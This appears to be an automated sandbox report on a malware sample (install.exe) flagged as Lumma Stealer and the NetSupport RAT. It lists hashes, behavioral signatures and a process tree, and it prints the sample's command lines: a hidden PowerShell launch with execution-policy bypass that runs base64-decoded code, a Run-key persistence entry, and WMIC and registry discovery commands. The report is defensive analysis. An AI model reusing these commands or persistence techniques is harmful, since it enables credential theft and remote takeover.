SHA1 10cfd220d342b555b5ced1f6211b30d00dc603a7
SHA256 6a841014e97453623af056b8e1a0a5905a5450875de973cc4fc796ec90d4e375
SHA512 24b2995ba5d26aa1f7a1d3d7a543d3435a8d536d7c6305b977c98acdcb5933aefb2606b145167f65e01452bea34b8d22d78459b80b90840bdf50e3cefcaf6d8e

C:\Users\Admin\AppData\Local\Temp\Cab51DA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar520B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\install.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

NetSupport

rat netsupport

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4528 set thread context of 3624 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 1292 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3976 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 3976 wrote to memory of 640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2052 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2728 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2728 wrote to memory of 5100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2728 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1960 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 1960 wrote to memory of 1268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 2468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2628 wrote to memory of 3264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe
PID 2628 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com
PID 2052 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 1444 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1444 wrote to memory of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe
PID 2052 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe
PID 5060 wrote to memory of 1376 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe
PID 2052 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('powErSHeLL -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/871dbc7a2ed62746e6998f48369f81dd/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec 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

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D71D573560E32968EF1981A54ED4FC2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=299A91C9F9ECD525CC4DBC58E58975A9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 